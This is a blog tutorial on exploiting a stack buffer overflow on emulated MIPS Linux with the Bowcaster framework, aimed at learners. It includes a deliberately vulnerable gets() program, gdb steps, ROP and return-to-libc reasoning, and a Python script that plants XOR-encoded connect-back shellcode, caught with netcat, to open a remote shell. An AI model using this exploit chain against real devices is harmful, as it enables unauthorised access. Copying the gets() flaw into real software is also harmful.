MIPS Buffer Overflows with Bowcaster

On October 13, 2013, in Tutorial, by Matt Defenthaler

This post should be capable of walking a novice through the process of exploiting a buffer overflow vulnerability on a MIPS platform. However, I’m actually writing this for myself since I’ve found that forcing myself to teach others is a great way to make sure I completely understand the concepts. We will be using a wonderful utility framework developed by Zach Cutlip called Bowcaster. Zach also has a tutorial of his own that contributed to my understanding of both MIPS exploitation and the use of his framework.

A note about Bowcaster:
Bowcaster is a utility written in Python that provides a nice API for organizing, documenting, and crafting exploits for the MIPS architecture. It is open source and extremely well-documented. It includes utilities that range from creating an initial patterned string useful for identifying offsets at which to place parts of an exploit to an XOR encoder to some near universal shellcode payloads. It also works with both big and little endian MIPS.

The basic process will be as follows:

  1. Get our MIPS emulator (qemu) running
  2. Install some essential utilities (gcc, gdb)
  3. Write a vulnerable application in C and compile it
  4. Explore the process of crafting an exploit
  5. Get a remote shell!

Firstly, we can’t rely directly on the x86 processor running our PC, so we have to install an emulator that understands MIPS. Zach put together a pretty good tutorial on compiling and running Qemu in an Ubuntu VM. Follow that before moving forward. NOTE: I used Ubuntu 12.04 in my VirtualBox VM and didn’t run into any major differences. Also, I will be using the mipsel (LSB, little endian) kernel and filesystem image in this tutorial, but the principles are essentially the same with big endian MIPS.

Once you have Qemu running Linux, go ahead and run (at the time of this writing apt-get pulls in gcc 4.4.5 and gdb 7.6)

apt-get install gcc gdb objdump

Open a text editor (nano and vi are there. I apt-get installed ‘mg’ which is a small emacs clone)

nano Vuln.c

insert the following C code and then save and exit (Ctrl+x followed by y if you’re in nano)

#include <stdio.h>

GetInput()
{
    char buffer[512]; // the buffer we'll overflow

    gets(buffer); // gets is a vulnerable function because it stores input 
                  // into a buffer even if the buffer is too small
}

main()
{
    GetInput();

    return 0;
}

Next, we’ll compile the program:

gcc -ggdb -o Vuln Vuln.c

That should produce the Vuln file which is our vulnerable program. (-ggdb compiles with debug symbols which will make it easier to navigate our code)

Now that we have our vulnerable executable, we can focus on the exploit side of things and start getting into Bowcaster.

First, a note about what we’re doing:

Essentially, our vulnerable program only sets aside a certain amount of memory for user input. However, it puts no limitation on how many characters the user wants to input. As a result, if the user inputs more characters than the amount of memory allocated for the input, the input will overflow into an area outside what the program expects and will overwrite areas the program assumes were beyond what our buffer would need. This gives us the ability to overwrite areas of memory in a specific way that allows us to control what the program does.

The first part of memory we’re interested in controlling is the return address of the GetInput() function. In order to discover the location of the portion in our input string that will overwrite the return address, we use Bowcaster to create a large string of a unique pattern of characters. We can then run our program with gdb and check the value that gets copied into $ra (return address register) and then determine its location in our input string.

First, open up your editor

nano PatternMaker.py

Now code up the following script that will output our patterned string to a file

from bowcaster.development.overflowbuilder import OverflowBuffer
from bowcaster.common.support import LittleEndian

buf = OverflowBuffer(LittleEndian, 2048)

# create a file called 'bof' and write a 
# 2048 character patterned string to it
f = open('bof', 'w')
f.write(str(buf))
f.close()

Save the file and close the editor. Then, run the script

python PatternMaker.py

If you list the directory, you should see a new file called ‘bof’.

Next, open Vuln in gdb so we can debug it.

gdb Vuln

Before we run the program, we want to set a breakpoint just before GetInput() returns. List the program’s code by typing list and find out which line contains gets() in the GetInput() function.

Put a breakpoint at that line by entering (replacing the caps stuff, obviously)

b PUT_THE_LINE_NUMBER_HERE

Next, we’ll run Vuln using the contents of ‘bof’ as input

run < bof

The program should now be stopped at the breakpoint. Just for reference take a peek at $ra by running

info registers

At this point, $ra has not yet been overwritten. However, the call to gets() will put the contents of ‘bof’ on the stack and, when GetInput() resumes, it enters its epilogue which is depending on information stored on the stack to know which function it should return to (in this program, main() called GetInput(), so the return address should be the address of the instruction in main() that called GetInput()).

If we run the following command, we can determine where to add another breakpoint in order to view the value that got loaded into $ra

disas GetInput

Find the line near the bottom that contains the instruction ‘ jr   ra ‘. Use the hex address of that instruction to set a breakpoint.

b *0xADDRESS

Resume execution by typing continue and hitting enter. The program should pause at the new breakpoint and we can run info registers to check the new value of $ra. Copy $ra ‘s value because we’ll need it in a second.

Type quit into the gdb prompt and allow it to exit. Then, create a new file called PatternFinder.py and add the following to it:

import sys
from bowcaster.development.overflowbuilder import OverflowBuffer
from bowcaster.common.support import LittleEndian

buf = OverflowBuffer(LittleEndian, 2048)

# open the 'bof' file created by PatternMaker.py
# and put its contents in buf.overflow_string
f = open('bof', 'r')
buf.overflow_string = f.read()
f.close()

search_value = sys.argv[1]
value = int(search_value, 16) # convert the hex string to an int
offset = buf.find_offset(value)
if offset < 0:
    print "Couldn't find value %s in the overflow buffer" % search_value
else:
    print "Found value %s at\noffset: %d" % (search_value, offset)

Save, exit, and run the following where the last argument is the value you copied from $ra

python PatternFinder.py VALUE_FROM_RA

The script should print out the location of the value from $ra in ‘bof’. Since our input string overflowed into memory beyond what was allocated for it, when the epilogue of GetInput() loads what it believes is the return address into main() that it stored in the prologue, it actually copies part of ‘bof’ into $ra. This means that we have control over where the program goes after GetInput()!

Now we’ll begin crafting our exploit, but first, a note:
This particular exploit will be using a ‘return-oriented programming’ (ROP) attack. We’ll be searching for blocks of assembly code we can tie together via controlling jump or branch instructions. These blocks of code will fill registers with values from the overflowed positions on the stack, call functions, pretty much whatever we want. The blocks of code ending in jump/branch instructions that we will tie together to build our exploit are called ROP gadgets. Since we’re relying on libc for gets(), we can take advantage of the fact that our program has access to all of libc. Using an external library like libc has a couple of advantages. One advantage is that large libraries give us more potential ROP gadgets, which is especially useful when the vulnerable binary is very small (like the one in this tutorial). Another advantage is that libraries’ text segment addresses are less likely to contain null characters due to them generally being loaded at higher addresses than the vulnerable executable (for instance, Vuln’s text segment starts with a null character: 0x00400000). It is important to account for null characters and other ‘badchars’ because input to programs is generally terminated at the first sign of one and that means the input beyond that character will be ignored. Because we’re using the included libc library for our exploit, this is technically a ‘return-to-libc’ technique.

In order to use a library like libc, we need to find the address of its text segment in the memory for our program. First, start Vuln in the background, then use the process ID to look up the base address for libc’s text segment. Feel free to terminate Vuln once you’ve found the address.

root@debian-mipsel:~# ./Vuln &
[2] 3123
[2]+ Stopped ./Vuln
root@debian-mipsel:~# cat /proc/3123/maps
00400000-00401000 r-xp 00000000 08:01 578741 /root/Vuln
00410000-00411000 rw-p 00000000 08:01 578741 /root/Vuln
2aaa8000-2aacb000 r-xp 00000000 08:01 261992 /lib/ld-2.11.3.so
2aacb000-2aace000 rw-p 00000000 00:00 0 
2aada000-2aadb000 r--p 00022000 08:01 261992 /lib/ld-2.11.3.so
2aadb000-2aadc000 rw-p 00023000 08:01 261992 /lib/ld-2.11.3.so
2aadc000-2ac42000 r-xp 00000000 08:01 261990 /lib/libc-2.11.3.so
2ac42000-2ac51000 ---p 00166000 08:01 261990 /lib/libc-2.11.3.so
2ac51000-2ac5a000 r--p 00165000 08:01 261990 /lib/libc-2.11.3.so
2ac5a000-2ac5c000 rw-p 0016e000 08:01 261990 /lib/libc-2.11.3.so
2ac5c000-2ac6f000 rw-p 00000000 00:00 0 
7f94f000-7f964000 rwxp 00000000 00:00 0 [stack]

The libc text segment’s base address is 0x2aadc000 (notice the ‘x’ in the privileges). Note that yours may be different.

Now we’re ready to begin writing our exploit generation script. Start by opening a new file called Exploity.py in your editor and add the following to it.

from bowcaster.development.overflowbuilder import SectionCreator, OverflowBuffer
from bowcaster.common.support import LittleEndian

qemu_libc_base = 0x2aadc000
badchars = ['\0','\n']
SC=SectionCreator(LittleEndian, base_address=qemu_libc_base, badchars=badchars)
sections=[]

Save and exit.

Next comes the cumbersome, but kinda fun part. We have to look through disassembled libc to find the ROP gadgets we can tie together that will execute some shellcode. To save time, I like to save the output of objdump -d /lib/libc-2.11.2.so to a file and then open it with less for searching for ROP gadgets. It’s really easy to search using regular expressions in less, too.

The goals of our ROP gadgets are as follows:

  1. Load values from the stack into as many of the s-registers (s0-s8) as we can and into $ra
  2. a) Set up $a0 with a low value, b) set register to address of sleep() in libc, c) jump into register
  3. Store a location relative to the stack pointer ($sp) into a register
  4. Use that register (or one that its value was copied into) in a jump instruction

(1) lets us put 4-byte segments of ‘bof’ into the s-registers. If we need an s-register to hold a certain value, we just pass the value of the register into PatternFinder.py and use the returned offset to tell our exploit script to load a different, more useful value in its place. The same goes for $ra, which we’ll replace with the the address of the ROP gadget we’ll use for (2).

(2) The a-registers are used to store arguments that a function is called with. sleep() needs an argument in $a0 to know how many seconds to sleep. Why sleep()? Well, our buffer overflow contents are currently in the data cache (as opposed to instruction cache) and can’t be executed. sleep() causes a context switch and must push all of the cache back into main memory. Once the overflow’s contents are in main memory, there’s no telling if it was data or instructions (exactly what we want).

(3,4) Because the stack is randomized (subsequent runs of the same program will cause the stack to be loaded at a different address), we have to ‘find’ the stack by storing a relative reference to it in a register and then use that register or one that receives its value in a jump instruction. Once a ROP gadget to locate the stack is found, we can use gdb to step through Vuln and determine what part of ‘bof’ exists at that location, feed it into PatternFinder.py and add our shellcode at that offset in ‘bof’. This is assuming that the relative stack position our ROP gadget uses actually contains data overflowed from ‘bof’. If it doesn’t, it’s back to searching through assembly to find a gadget that does.

NOTE: Sometimes shellcodes are long and the relative stack position might not give enough room to fit the shellcode before overwriting a different offset we were already using in ‘bof’. I will leave the solution to this as an exercise for the reader. Hint: once you can execute shellcode, you can tell the program what assembly to execute (you don’t have to rely on it already being there like with the ROP gadgets).

The remainder of the process will require stepping through arbitrary locations of libc. Since gdb isn’t expecting a user to jump into the middle of a function, I’ve found it helpful to run the following before returning the first ROP gadget.

display/i $pc
stepi

This will show the next assembly instruction to be executed and will repeat with each consecutive step.

It’s also useful to display what is in a register or at a memory address. There are a ton of formats for displaying values in gdb, but the two most useful are below and are for instructions and 4-byte words as hex, respectively.

x/i $pc+4
x/wx $s0

Once we can jump to a relative stack location, it’s time to use some shellcode. Fortunately, Bowcaster comes with some some useful shellcode utilities. The one we’ll use here is a connect-back shell. We just give it an IP to connect back to and the endianness. For simplicity’s sake, the connect-back IP can be that of the host (as opposed to the target which is running in qemu). Since our host’s IP contains a 0, we need to use the provided XOR encoder. The encoder performs an XOR operation on the connect-back shellcode with a randomly generated key and then includes a decoder in the shellcode to reverse the operation upon execution on the target. This is all necessary to prevent our overflow string from being terminated at the first bad character.

Append the following to the bottom of Exploit.py (the imports can be placed at the top of the file if desired and make sure to replace YOUR_OFFSET_HERE with the offset in ‘bof’ to insert the shellcode):

from bowcaster.payloads.mips.connectback_payload import ConnectbackPayload
from bowcaster.encoders.mips import MipsXorEncoder

payload=ConnectbackPayload("10.0.2.15",LittleEndian)

#XOR encode the payload
encoded_payload=MipsXorEncoder(payload,badchars=badchars)

section=SC.string_section(YOUR_OFFSET_HERE, encoded_payload.shellcode, "encoded connect-back payload")
sections.append(section)

# create the OverflowBuffer and fill it with our ROP gadgets and shellcode
buf = OverflowBuffer(LittleEndian, 2048, sections)
f = open('bof', 'w')
f.write(str(buf))
f.close()

Assuming the contents of ‘bof’ contain all the necessary ROP gadgets and the connect-back shell shellcode at the appropriate locations, you open a terminal on your host machine and run:

nc -l 8080

This listens for an incoming connection on port 8080 (the default port of the connect-back shell). Next, on the qemu mipsel target, run:

python Exploit.py
cat bof | ./Vuln

The program should appear to be hanging. Once you’ve achieved that, go back to the host terminal where nc -l 8080 is running. It, too, should be appear to be hanging. However, neither of the processes is hanging and if you type ls or date or another command into the host terminal, you’ll notice you’re actually in a shell on the target! Hitting Ctrl+c in either terminal will end the session. It should be noted that Bowcaster also includes a connect-back server class that provides a lot more flexibility than just using netcat.

References:
A great overview of MIPS and exploiting MIPS devices
Walk-through of a real-world MIPS exploit by Craig Heffner (one of many posts)
Walk-through with Bowcaster by its author Zach Cutlip (one of many posts)

Attachments:
Exploity.py –  contains spoilers and I highly recommend you only view this as needed in order to truly learn and understand the process detailed above

Special thanks to Zach for reviewing this tutorial and providing me with more accurate info about a couple of things I goofed up or could have been more clear about in the original post.

Tagged with:
 

Leave a Reply

Your email address will not be published. Required fields are marked *